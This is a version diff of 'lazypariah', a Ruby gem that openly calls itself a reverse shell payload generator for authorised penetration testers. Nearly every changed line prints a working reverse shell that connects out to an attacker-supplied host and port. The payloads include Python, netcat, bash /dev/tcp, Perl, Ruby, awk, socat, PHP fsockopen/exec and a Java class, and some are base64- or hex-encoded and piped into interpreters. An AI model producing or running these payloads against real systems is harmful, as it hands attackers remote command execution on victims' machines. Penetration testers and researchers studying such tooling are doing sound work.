lazypariah 0.4.0 → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/bin/lazypariah +77 -89
- metadata +3 -3
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 39fa66ebf06f26ea52ea9033989efa12ac2a517eaaecc9403c71f5cc6e2e0203
|
|
4
|
+
data.tar.gz: f8de654a384319b9b3f11cb8dd5d0c0618ed17086115144c92fee6b5e20a29c5
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c8ec9e1b3e0301e242ebe549db465103c72bd47b5b8799df416846143d6d61352f427e8dcb2b030dd03c4988558275bc2127b06df501f771ff989e20909be014
|
|
7
|
+
data.tar.gz: 82cd305608c676d0254d7bd9177cc2e227363fbfdbb5878628d82cc3adccef4719ad78eb06a4d6dbe5a06009fbe1431e591b57e09937d3fd9419922e90e8b5e2
|
data/bin/lazypariah
CHANGED
|
@@ -1,13 +1,13 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 0.
|
|
4
|
+
# Version: 1.0.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
8
8
|
# qualified penetration testers, security researchers and red team professionals.
|
|
9
9
|
#
|
|
10
|
-
# Copyright (C) 2020 Peter Bruce Funnell
|
|
10
|
+
# Copyright (C) 2020-2021 Peter Bruce Funnell
|
|
11
11
|
#
|
|
12
12
|
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
|
|
13
13
|
# General Public License as published by the Free Software Foundation, either version 3 of the License,
|
|
@@ -29,35 +29,22 @@ require "stringio"
|
|
|
29
29
|
|
|
30
30
|
# Define constants.
|
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
32
|
-
PROGRAM_VERSION = "0.
|
|
32
|
+
PROGRAM_VERSION = "1.0.0".freeze()
|
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
34
34
|
|
|
35
35
|
# Define payload list.
|
|
36
36
|
PAYLOAD_LIST = [
|
|
37
37
|
"python",
|
|
38
|
-
"python3_c",
|
|
39
|
-
"python2_c",
|
|
40
38
|
"python_c",
|
|
41
|
-
"python3_b64",
|
|
42
|
-
"python2_b64",
|
|
43
39
|
"python_b64",
|
|
44
|
-
"python3_hex",
|
|
45
|
-
"python2_hex",
|
|
46
40
|
"python_hex",
|
|
47
41
|
"nc",
|
|
48
42
|
"nc_pipe",
|
|
49
|
-
"
|
|
50
|
-
"
|
|
51
|
-
"
|
|
52
|
-
"
|
|
53
|
-
"
|
|
54
|
-
"php_fd_4_c",
|
|
55
|
-
"php_fd_5_c",
|
|
56
|
-
"php_fd_6_c",
|
|
57
|
-
"php_fd_3_tags",
|
|
58
|
-
"php_fd_4_tags",
|
|
59
|
-
"php_fd_5_tags",
|
|
60
|
-
"php_fd_6_tags",
|
|
43
|
+
"php_fd",
|
|
44
|
+
"php_fd_c",
|
|
45
|
+
"php_fd_tags",
|
|
46
|
+
"php_system_python_b64",
|
|
47
|
+
"php_system_python_hex",
|
|
61
48
|
"perl",
|
|
62
49
|
"perl_c",
|
|
63
50
|
"perl_b64",
|
|
@@ -103,7 +90,10 @@ option_parser = OptionParser.new do |options|
|
|
|
103
90
|
options.on("-h", "--help", "Display help text and exit.")
|
|
104
91
|
options.on("-l", "--license", "Display license information and exit.")
|
|
105
92
|
options.on("-u", "--url", "URL-encode the payload.")
|
|
106
|
-
options.on("-v", "--version", "Display version information and exit
|
|
93
|
+
options.on("-v", "--version", "Display version information and exit.")
|
|
94
|
+
options.on("-D INTEGER", "--fd INTEGER", "Specify the file descriptor used by the target for TCP. Required for certain payloads.")
|
|
95
|
+
options.on("-P INTEGER", "--pv INTEGER", "Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.")
|
|
96
|
+
options.on("-N", "--no-new-line", "Do not append a new-line character to the end of the payload.\n\n")
|
|
107
97
|
end
|
|
108
98
|
|
|
109
99
|
# Define port_check method for strings.
|
|
@@ -114,18 +104,22 @@ class String
|
|
|
114
104
|
end
|
|
115
105
|
|
|
116
106
|
# Define print_output.
|
|
117
|
-
def print_output(s, url_encode=false)
|
|
107
|
+
def print_output(s, url_encode=false, new_line=true)
|
|
118
108
|
if url_encode
|
|
119
109
|
print(ERB::Util.url_encode(s))
|
|
120
110
|
else
|
|
121
111
|
print(s)
|
|
122
112
|
end
|
|
113
|
+
if new_line
|
|
114
|
+
puts()
|
|
115
|
+
end
|
|
123
116
|
end
|
|
124
117
|
|
|
125
118
|
# Attempt to parse command line arguments.
|
|
126
119
|
begin
|
|
127
120
|
arguments = Hash.new()
|
|
128
121
|
option_parser.parse!(into: arguments)
|
|
122
|
+
|
|
129
123
|
if arguments[:version]
|
|
130
124
|
prog_info(donation_info=false)
|
|
131
125
|
exit()
|
|
@@ -162,87 +156,81 @@ begin
|
|
|
162
156
|
puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
|
|
163
157
|
else
|
|
164
158
|
url_encode = arguments[:url] ? true: false
|
|
159
|
+
|
|
160
|
+
# Get TCP file descriptor from command-line argument, if provided. This is required for some payloads (e.g. php_fd).
|
|
161
|
+
tcp_fd = arguments[:"fd"]
|
|
162
|
+
if tcp_fd and not tcp_fd.to_i().to_s() == tcp_fd
|
|
163
|
+
puts("Invalid file descriptor detected. When specifying a file descriptor via the command-line argument \"-D INTEGER\" or \"--fd INTEGER\", that file descriptor must be a valid integer (e.g. 3, 4, 5 or 6).")
|
|
164
|
+
exit()
|
|
165
|
+
end
|
|
166
|
+
|
|
167
|
+
# Get Python version from command-line argument, if provided. This is useful for some payloads (e.g. python_b64).
|
|
168
|
+
python_version = arguments[:"pv"]
|
|
169
|
+
if python_version and ((not python_version.to_i().to_s() == python_version) or (not ["2", "3"].include?(python_version)))
|
|
170
|
+
puts("The Python version specified for the payload was invalid. When specifying a Python version for a payload via the command-line argument \"-P INTEGER\" or \"--pv INTEGER\", that version must be equal to either \"2\" or \"3\".")
|
|
171
|
+
exit()
|
|
172
|
+
end
|
|
173
|
+
|
|
165
174
|
case ARGV[0]
|
|
166
175
|
when "python"
|
|
167
|
-
print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
|
|
168
|
-
when "python3_c"
|
|
169
|
-
print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
|
170
|
-
when "python2_c"
|
|
171
|
-
print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
|
176
|
+
print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
172
177
|
when "python_c"
|
|
173
|
-
print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
|
174
|
-
when "python3_b64"
|
|
175
|
-
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
176
|
-
print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
|
|
177
|
-
when "python3_hex"
|
|
178
|
-
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
179
|
-
print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
|
|
180
|
-
when "python2_b64"
|
|
181
|
-
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
182
|
-
print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
|
|
183
|
-
when "python2_hex"
|
|
184
|
-
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
185
|
-
print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
|
|
178
|
+
print_output("python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
186
179
|
when "python_b64"
|
|
187
180
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
188
|
-
print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
|
|
181
|
+
print_output("echo #{code} | base64 -d | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
189
182
|
when "python_hex"
|
|
190
183
|
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
191
|
-
print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
|
|
184
|
+
print_output("echo #{code} | xxd -p -r - | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
185
|
+
when "php_system_python_b64"
|
|
186
|
+
python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
187
|
+
print_output("<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
188
|
+
when "php_system_python_hex"
|
|
189
|
+
python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
190
|
+
print_output("<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
192
191
|
when "nc"
|
|
193
|
-
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
|
192
|
+
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
194
193
|
when "nc_pipe"
|
|
195
|
-
print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
|
196
|
-
when "
|
|
197
|
-
|
|
198
|
-
|
|
199
|
-
|
|
200
|
-
|
|
201
|
-
|
|
202
|
-
|
|
203
|
-
|
|
204
|
-
|
|
205
|
-
|
|
206
|
-
|
|
207
|
-
|
|
208
|
-
|
|
209
|
-
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
|
|
210
|
-
when "php_fd_6_c"
|
|
211
|
-
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
|
|
212
|
-
when "php_fd_3_tags"
|
|
213
|
-
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
|
|
214
|
-
when "php_fd_4_tags"
|
|
215
|
-
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
|
|
216
|
-
when "php_fd_5_tags"
|
|
217
|
-
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
|
|
218
|
-
when "php_fd_6_tags"
|
|
219
|
-
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
|
|
194
|
+
print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
195
|
+
when "php_fd", "php_fd_c", "php_fd_tags"
|
|
196
|
+
if not tcp_fd
|
|
197
|
+
puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
|
|
198
|
+
else
|
|
199
|
+
case ARGV[0]
|
|
200
|
+
when "php_fd"
|
|
201
|
+
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
202
|
+
when "php_fd_c"
|
|
203
|
+
print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
204
|
+
when "php_fd_tags"
|
|
205
|
+
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
206
|
+
end
|
|
207
|
+
end
|
|
220
208
|
when "perl"
|
|
221
|
-
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
|
209
|
+
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
222
210
|
when "perl_c"
|
|
223
|
-
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
|
211
|
+
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
224
212
|
when "perl_b64"
|
|
225
213
|
code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
|
|
226
|
-
print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
|
|
214
|
+
print_output("echo #{code} | base64 -d | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
227
215
|
when "perl_hex"
|
|
228
216
|
code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
|
|
229
|
-
print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
|
|
217
|
+
print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
230
218
|
when "ruby"
|
|
231
|
-
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
|
219
|
+
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
232
220
|
when "ruby_c"
|
|
233
|
-
print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
|
|
221
|
+
print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
234
222
|
when "ruby_b64"
|
|
235
223
|
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
|
236
|
-
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
|
224
|
+
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
237
225
|
when "ruby_hex"
|
|
238
226
|
code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
|
|
239
|
-
print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
|
|
227
|
+
print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
240
228
|
when "bash_tcp"
|
|
241
|
-
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
|
229
|
+
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
242
230
|
when "awk"
|
|
243
|
-
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
|
|
231
|
+
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
244
232
|
when "socat"
|
|
245
|
-
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
|
|
233
|
+
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
246
234
|
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
|
|
247
235
|
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
|
248
236
|
|
|
@@ -255,10 +243,10 @@ begin
|
|
|
255
243
|
java_payload = f.read()
|
|
256
244
|
case ARGV[0]
|
|
257
245
|
when "java_class_binary"
|
|
258
|
-
print_output(java_payload)
|
|
246
|
+
print_output(java_payload, new_line=false)
|
|
259
247
|
when "java_class_b64"
|
|
260
248
|
java_payload_b64 = Base64.strict_encode64(java_payload)
|
|
261
|
-
print_output(java_payload_b64, url_encode=url_encode)
|
|
249
|
+
print_output(java_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
262
250
|
when "java_class_gzip_b64"
|
|
263
251
|
sio = StringIO.new()
|
|
264
252
|
sio.binmode()
|
|
@@ -267,7 +255,7 @@ begin
|
|
|
267
255
|
gz.close()
|
|
268
256
|
java_payload_gzip = sio.string
|
|
269
257
|
java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
|
|
270
|
-
print_output(java_payload_gzip_b64, url_encode=url_encode)
|
|
258
|
+
print_output(java_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
271
259
|
end
|
|
272
260
|
end
|
|
273
261
|
|
|
@@ -284,13 +272,13 @@ begin
|
|
|
284
272
|
binary_payload = f.read()
|
|
285
273
|
case ARGV[0]
|
|
286
274
|
when "c_binary"
|
|
287
|
-
print_output(binary_payload)
|
|
275
|
+
print_output(binary_payload, new_line=false)
|
|
288
276
|
when "c_binary_b64"
|
|
289
277
|
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
|
290
|
-
print_output(binary_payload_b64, url_encode=url_encode)
|
|
278
|
+
print_output(binary_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
291
279
|
when "c_binary_hex"
|
|
292
280
|
binary_payload_hex = binary_payload.unpack("H*")[0]
|
|
293
|
-
print_output(binary_payload_hex)
|
|
281
|
+
print_output(binary_payload_hex, new_line=!arguments[:"no-new-line"])
|
|
294
282
|
when "c_binary_gzip"
|
|
295
283
|
sio = StringIO.new()
|
|
296
284
|
sio.binmode()
|
|
@@ -298,7 +286,7 @@ begin
|
|
|
298
286
|
gz.write(binary_payload)
|
|
299
287
|
gz.close()
|
|
300
288
|
binary_payload_gzip = sio.string
|
|
301
|
-
print_output(binary_payload_gzip)
|
|
289
|
+
print_output(binary_payload_gzip, new_line=false)
|
|
302
290
|
when "c_binary_gzip_b64"
|
|
303
291
|
sio = StringIO.new()
|
|
304
292
|
sio.binmode()
|
|
@@ -307,12 +295,12 @@ begin
|
|
|
307
295
|
gz.close()
|
|
308
296
|
binary_payload_gzip = sio.string
|
|
309
297
|
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
|
310
|
-
print_output(binary_payload_gzip_b64, url_encode=url_encode)
|
|
298
|
+
print_output(binary_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
311
299
|
when "c_binary_gzip_hex"
|
|
312
300
|
sio = StringIO.new()
|
|
313
301
|
sio.binmode()
|
|
314
302
|
gz = Zlib::GzipWriter.new(sio)
|
|
315
|
-
gz.write(binary_payload)
|
|
303
|
+
gz.write(binary_payload, new_line=!arguments[:"no-new-line"])
|
|
316
304
|
gz.close()
|
|
317
305
|
binary_payload_gzip = sio.string
|
|
318
306
|
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: lazypariah
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 1.0.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Peter Funnell
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date:
|
|
11
|
+
date: 2021-03-08 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|
|
@@ -44,7 +44,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
44
44
|
requirements:
|
|
45
45
|
- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
|
|
46
46
|
and OpenJDK (for Java payloads).
|
|
47
|
-
rubygems_version: 3.
|
|
47
|
+
rubygems_version: 3.2.5
|
|
48
48
|
signing_key:
|
|
49
49
|
specification_version: 4
|
|
50
50
|
summary: A tool for generating reverse shell payloads on the fly.
|